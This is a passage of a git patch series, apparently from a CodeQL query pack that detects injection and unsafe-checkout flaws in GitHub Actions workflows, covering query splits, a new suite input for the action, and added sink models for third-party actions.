of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 5130135df0a87da6f23eba4b81b11383b254b19a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 16:14:55 +0100 Subject: [PATCH 0109/1267] fix(stepsExpression): allow steps from a composite action to communicate --- ql/lib/codeql/actions/ast/internal/Ast.qll | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5c6ce37fa92..f45565caed7 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -855,7 +855,14 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getEnclosingJob() = result.getEnclosingJob() and + ( + this.getEnclosingJob() = result.getEnclosingJob() + or + exists(CompositeActionImpl a | + a.getAChildNode*() = this and + a.getAChildNode*() = result + ) + ) and result.(StepImpl).getId() = stepId } From cfed2d4ce029136bab61eefaaf666c77ecbff8d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 16:30:23 +0100 Subject: [PATCH 0110/1267] Split queries --- ql/src/Security/CWE-078/CommandInjection.ql | 38 +++++++++++++++ .../CWE-078/CriticalCommandInjection.ql | 44 ++++++++++++++++++ ql/src/Security/CWE-094/CodeInjection.ql | 40 ++++++++++++++++ .../Security/CWE-094/CriticalCodeInjection.ql | 46 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 +- ql/src/Security/CWE-918/RequestForgery.ql | 37 +++++++++++++++ 6 files changed, 206 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-078/CommandInjection.ql create mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql create mode 100644 ql/src/Security/CWE-094/CodeInjection.ql create mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql create mode 100644 ql/src/Security/CWE-918/RequestForgery.ql diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql new file mode 100644 index 00000000000..2a2225e17b6 --- /dev/null +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -0,0 +1,38 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql new file mode 100644 index 00000000000..3834b0ac0d0 --- /dev/null +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -0,0 +1,44 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w +where + MyFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql new file mode 100644 index 00000000000..7ad0e98bc49 --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -0,0 +1,40 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql new file mode 100644 index 00000000000..5a4bbaca034 --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -0,0 +1,46 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w +where + MyFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 33d6260203e..d59cc07cad2 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -20,8 +20,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, - ["expression-injection", "command-injection", "request-forgery", "code-injection"]) + externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql new file mode 100644 index 00000000000..3675597fcd7 --- /dev/null +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -0,0 +1,37 @@ +/** + * @name Uncontrolled data used in network request + * @description Sending network requests with user-controlled data allows for request forgery attacks. + * @kind path-problem + * @problem.severity error + * @security-severity 9.1 + * @precision high + * @id actions/request-forgery + * @tags actions + * security + * external/cwe/cwe-918 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class RequestForgerySink extends DataFlow::Node { + RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() From a9057a738600f2b01b3bfb8757fc0f7b1ead0cde Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 17:10:35 +0100 Subject: [PATCH 0111/1267] Add `suite` input --- .github/action/src/codeql.ts | 2 +- action.yml | 4 ++++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 48750388e57..4870ca27955 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: "codeql-suites/actions-code-scanning.qls", + suite: `codeql-suites/${core.getInput("suite")}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; diff --git a/action.yml b/action.yml index 61fd380c418..a294e981493 100644 --- a/action.yml +++ b/action.yml @@ -14,6 +14,10 @@ inputs: description: "SARIF File Output" default: "codeql-actions.sarif" + suite: + description: "CodeQL Suite to run" + default: "actions-code-scanning" + runs: using: 'composite' steps: From 678f99b6be23d957b45fd654b9eca9d8d31ada0d Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:14:33 +0000 Subject: [PATCH 0112/1267] build --- .github/action/dist/index.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index e931e22d3f8..61c4f537ad9 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28607,7 +28607,7 @@ async function newCodeQL() { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: "codeql-suites/actions-code-scanning.qls", + suite: `codeql-suites/${core.getInput("suite")}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From a9aba88bc5138ad70b88b7f7d116b048171657bc Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 17:21:26 +0100 Subject: [PATCH 0113/1267] Add alternate value --- .github/action/src/codeql.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 4870ca27955..56615fa80ce 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: `codeql-suites/${core.getInput("suite")}.qls`, + suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From 53209a26b18e2679840fc1ef084bbd984c0bfaf1 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:22:34 +0000 Subject: [PATCH 0114/1267] build --- .github/action/dist/index.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 61c4f537ad9..4c98f1d6301 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28607,7 +28607,7 @@ async function newCodeQL() { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: `codeql-suites/${core.getInput("suite")}.qls`, + suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From 70dd7fe18fa7e58d3d89def920a39120b621c07d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 17:47:20 +0100 Subject: [PATCH 0115/1267] Apply suggestions from code review Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com> --- ql/src/Security/CWE-078/CommandInjection.ql | 2 +- ql/src/Security/CWE-078/CriticalCommandInjection.ql | 4 ++-- ql/src/Security/CWE-094/CodeInjection.ql | 4 ++-- ql/src/Security/CWE-094/CriticalCodeInjection.ql | 6 +++--- ql/src/Security/CWE-918/RequestForgery.ql | 2 +- 5 files changed, 9 insertions(+), 9 deletions(-) diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 2a2225e17b6..9891f786f7c 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -34,5 +34,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql index 3834b0ac0d0..5d418ec1816 100644 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/command-injection + * @id actions/critical-command-injection * @tags actions * security * external/cwe/cwe-078 @@ -40,5 +40,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index 7ad0e98bc49..bc2dbffdcdf 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -36,5 +36,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql index 5a4bbaca034..2a1e4388d24 100644 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/code-injection + * @id actions/critical-code-injection * @tags actions * security * external/cwe/cwe-094 @@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -42,5 +42,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 3675597fcd7..d665a368991 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -33,5 +33,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential request forgery in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 1e64b18212fcc69a7d829bf3ae68d84045b9639f Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 19:09:22 +0100 Subject: [PATCH 0116/1267] Add suite that runs all queries --- ql/src/codeql-suites/actions-all.qls | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 ql/src/codeql-suites/actions-all.qls diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls new file mode 100644 index 00000000000..2439b95a8e5 --- /dev/null +++ b/ql/src/codeql-suites/actions-all.qls @@ -0,0 +1,2 @@ +- description: Standard Code Scanning queries for Actions +- queries: . \ No newline at end of file From d26ead7c3bfd9a609165f70791127538aea1f486 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Wed, 13 Mar 2024 23:22:13 +0100 Subject: [PATCH 0117/1267] Add security sinks --- ql/lib/ext/8398a7_action-slack.model.yml | 6 +++++ ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 15 ++++++++++++ ...nnn_action-semantic-pull-request.model.yml | 6 +++++ ql/lib/ext/anchore_sbom-action.model.yml | 10 ++++++++ ql/lib/ext/anchore_scan-action.model.yml | 6 +++++ .../ext/andresz1_size-limit-action.model.yml | 9 +++++++ ql/lib/ext/asdf-vm_actions.model.yml | 6 +++++ .../axel-op_googlejavaformat-action.model.yml | 7 ++++++ ql/lib/ext/azure_powershell.model.yml | 6 +++++ ql/lib/ext/bahmutov_npm-install.model.yml | 6 +++++ .../blackducksoftware_github-action.model.yml | 8 +++++++ .../bufbuild_buf-breaking-action.model.yml | 6 +++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 5 ++++ .../ext/bufbuild_buf-setup-action.model.yml | 7 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 +++++ ql/lib/ext/changesets_action.model.yml | 7 ++++++ .../ext/cloudflare_wrangler-action.model.yml | 7 ++++++ .../crazy-max_ghaction-chocolatey.model.yml | 6 +++++ .../crazy-max_ghaction-import-gpg.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 8 +++++++ ql/lib/ext/cypress-io_github-action.model.yml | 6 +++++ .../ext/dailydotdev_action-devcard.model.yml | 7 ++++++ ...me_reportgenerator-github-action.model.yml | 6 +++++ .../daspn_private-actions-checkout.model.yml | 7 ++++++ .../dawidd6_action-ansible-playbook.model.yml | 7 ++++++ ...dawidd6_action-download-artifact.model.yml | 6 +++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 11 +++++++++ ...er-practice_actions-setup-docker.model.yml | 8 +++++++ ql/lib/ext/docker_build-push-action.model.yml | 6 +++++ ql/lib/ext/endbug_latest-tag.model.yml | 9 +++++++ ql/lib/ext/expo_expo-github-action.model.yml | 7 ++++++ ...seextended_action-hosting-deploy.model.yml | 6 +++++ ql/lib/ext/gabrielbb_xvfb-action.model.yml | 7 ++++++ ql/lib/ext/game-ci_unity-builder.model.yml | 7 ++++++ .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 6 +++++ .../ext/go-semantic-release_action.model.yml | 6 +++++ .../golangci_golangci-lint-action.model.yml | 6 +++++ .../ext/gonuit_heroku-docker-deploy.model.yml | 7 ++++++ .../goreleaser_goreleaser-action.model.yml | 6 +++++ ...te-or-update-pull-request-action.model.yml | 9 +++++++ ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 9 +++++++ ql/lib/ext/ilammy_setup-nasm.model.yml | 7 ++++++ ql/lib/ext/imjohnbo_issue-bot.model.yml | 8 +++++++ ql/lib/ext/iterative_setup-cml.model.yml | 6 +++++ ql/lib/ext/iterative_setup-dvc.model.yml | 6 +++++ ...sives_github-pages-deploy-action.model.yml | 11 +++++++++ .../ext/johnnymorganz_stylua-action.model.yml | 6 +++++ .../ext/jurplel_install-qt-action.model.yml | 11 +++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 7 ++++++ ql/lib/ext/leafo_gh-actions-lua.model.yml | 7 ++++++ .../ext/leafo_gh-actions-luarocks.model.yml | 6 +++++ .../lucasbento_auto-close-issues.model.yml | 6 +++++ ql/lib/ext/magefile_mage-action.model.yml | 6 +++++ ql/lib/ext/maierj_fastlane-action.model.yml | 8 +++++++ .../manusa_actions-setup-minikube.model.yml | 9 +++++++ ql/lib/ext/mattdavis0351_actions.model.yml | 9 +++++++ .../ext/meteorengineer_setup-meteor.model.yml | 6 +++++ ql/lib/ext/microsoft_setup-msbuild.model.yml | 7 ++++++ ...hers-excellent_docker-build-push.model.yml | 16 +++++++++++++ ql/lib/ext/msys2_setup-msys2.model.yml | 7 ++++++ ql/lib/ext/mxschmitt_action-tmate.model.yml | 7 ++++++ ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +++++ .../ext/nanasess_setup-chromedriver.model.yml | 6 +++++ ql/lib/ext/nanasess_setup-php.model.yml | 6 +++++ ql/lib/ext/nick-fields_retry.model.yml | 8 +++++++ ql/lib/ext/octokit_graphql-action.model.yml | 6 +++++ ql/lib/ext/octokit_request-action.model.yml | 6 +++++ ql/lib/ext/olafurpg_setup-scala.model.yml | 6 +++++ .../paambaati_codeclimate-action.model.yml | 6 +++++ .../peter-evans_create-pull-request.model.yml | 6 +++++ .../ext/plasmicapp_plasmic-action.model.yml | 8 +++++++ .../preactjs_compressed-size-action.model.yml | 7 ++++++ ql/lib/ext/py-actions_flake8.model.yml | 12 ++++++++++ ...py-actions_py-dependency-install.model.yml | 6 +++++ ql/lib/ext/pyo3_maturin-action.model.yml | 9 +++++++ ...vecircus_android-emulator-runner.model.yml | 24 +++++++++++++++++++ ql/lib/ext/reggionick_s3-deploy.model.yml | 13 ++++++++++ .../ext/renovatebot_github-action.model.yml | 10 ++++++++ .../ext/roots_issue-closer-action.model.yml | 7 ++++++ ql/lib/ext/ros-tooling_setup-ros.model.yml | 6 +++++ ql/lib/ext/ruby_setup-ruby.model.yml | 5 ++++ ...ction-detect-and-tag-new-version.model.yml | 5 ++++ ...skitionek_notify-microsoft-teams.model.yml | 6 +++++ ql/lib/ext/snow-actions_eclint.model.yml | 6 +++++ .../ext/stackhawk_hawkscan-action.model.yml | 10 ++++++++ .../ext/step-security_harden-runner.model.yml | 6 +++++ ql/lib/ext/tibdex_backport.model.yml | 9 +++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 15 ++++++++++++ .../tryghost_action-deploy-theme.model.yml | 7 ++++++ ql/lib/ext/veracode_veracode-sca.model.yml | 9 +++++++ .../ext/wearerequired_lint-action.model.yml | 8 +++++++ ql/lib/ext/webfactory_ssh-agent.model.yml | 8 +++++++ ql/lib/ext/zaproxy_action-baseline.model.yml | 9 +++++++ ql/lib/ext/zaproxy_action-full-scan.model.yml | 9 +++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 ++- 99 files changed, 719 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/8398a7_action-slack.model.yml create mode 100644 ql/lib/ext/amannn_action-semantic-pull-request.model.yml create mode 100644 ql/lib/ext/anchore_sbom-action.model.yml create mode 100644 ql/lib/ext/anchore_scan-action.model.yml create mode 100644 ql/lib/ext/andresz1_size-limit-action.model.yml create mode 100644 ql/lib/ext/asdf-vm_actions.model.yml create mode 100644 ql/lib/ext/axel-op_googlejavaformat-action.model.yml create mode 100644 ql/lib/ext/azure_powershell.model.yml create mode 100644 ql/lib/ext/bahmutov_npm-install.model.yml create mode 100644 ql/lib/ext/blackducksoftware_github-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-setup-action.model.yml create mode 100644 ql/lib/ext/changesets_action.model.yml create mode 100644 ql/lib/ext/cloudflare_wrangler-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml create mode 100644 ql/lib/ext/cycjimmy_semantic-release-action.model.yml create mode 100644 ql/lib/ext/cypress-io_github-action.model.yml create mode 100644 ql/lib/ext/dailydotdev_action-devcard.model.yml create mode 100644 ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml create mode 100644 ql/lib/ext/daspn_private-actions-checkout.model.yml create mode 100644 ql/lib/ext/dawidd6_action-ansible-playbook.model.yml create mode 100644 ql/lib/ext/dawidd6_action-download-artifact.model.yml create mode 100644 ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml create mode 100644 ql/lib/ext/docker-practice_actions-setup-docker.model.yml create mode 100644 ql/lib/ext/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/endbug_latest-tag.model.yml create mode 100644 ql/lib/ext/expo_expo-github-action.model.yml create mode 100644 ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml create mode 100644 ql/lib/ext/gabrielbb_xvfb-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-builder.model.yml create mode 100644 ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml create mode 100644 ql/lib/ext/go-semantic-release_action.model.yml create mode 100644 ql/lib/ext/golangci_golangci-lint-action.model.yml create mode 100644 ql/lib/ext/gonuit_heroku-docker-deploy.model.yml create mode 100644 ql/lib/ext/goreleaser_goreleaser-action.model.yml create mode 100644 ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml create mode 100644 ql/lib/ext/ilammy_msvc-dev-cmd.model.yml create mode 100644 ql/lib/ext/ilammy_setup-nasm.model.yml create mode 100644 ql/lib/ext/imjohnbo_issue-bot.model.yml create mode 100644 ql/lib/ext/iterative_setup-cml.model.yml create mode 100644 ql/lib/ext/iterative_setup-dvc.model.yml create mode 100644 ql/lib/ext/jamesives_github-pages-deploy-action.model.yml create mode 100644 ql/lib/ext/johnnymorganz_stylua-action.model.yml create mode 100644 ql/lib/ext/jurplel_install-qt-action.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-lua.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-luarocks.model.yml create mode 100644 ql/lib/ext/lucasbento_auto-close-issues.model.yml create mode 100644 ql/lib/ext/magefile_mage-action.model.yml create mode 100644 ql/lib/ext/maierj_fastlane-action.model.yml create mode 100644 ql/lib/ext/manusa_actions-setup-minikube.model.yml create mode 100644 ql/lib/ext/meteorengineer_setup-meteor.model.yml create mode 100644 ql/lib/ext/microsoft_setup-msbuild.model.yml create mode 100644 ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml create mode 100644 ql/lib/ext/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/mxschmitt_action-tmate.model.yml create mode 100644 ql/lib/ext/nanasess_setup-chromedriver.model.yml create mode 100644 ql/lib/ext/nanasess_setup-php.model.yml create mode 100644 ql/lib/ext/nick-fields_retry.model.yml create mode 100644 ql/lib/ext/octokit_graphql-action.model.yml create mode 100644 ql/lib/ext/octokit_request-action.model.yml create mode 100644 ql/lib/ext/olafurpg_setup-scala.model.yml create mode 100644 ql/lib/ext/paambaati_codeclimate-action.model.yml create mode 100644 ql/lib/ext/peter-evans_create-pull-request.model.yml create mode 100644 ql/lib/ext/plasmicapp_plasmic-action.model.yml create mode 100644 ql/lib/ext/preactjs_compressed-size-action.model.yml create mode 100644 ql/lib/ext/py-actions_flake8.model.yml create mode 100644 ql/lib/ext/py-actions_py-dependency-install.model.yml create mode 100644 ql/lib/ext/pyo3_maturin-action.model.yml create mode 100644 ql/lib/ext/reactivecircus_android-emulator-runner.model.yml create mode 100644 ql/lib/ext/reggionick_s3-deploy.model.yml create mode 100644 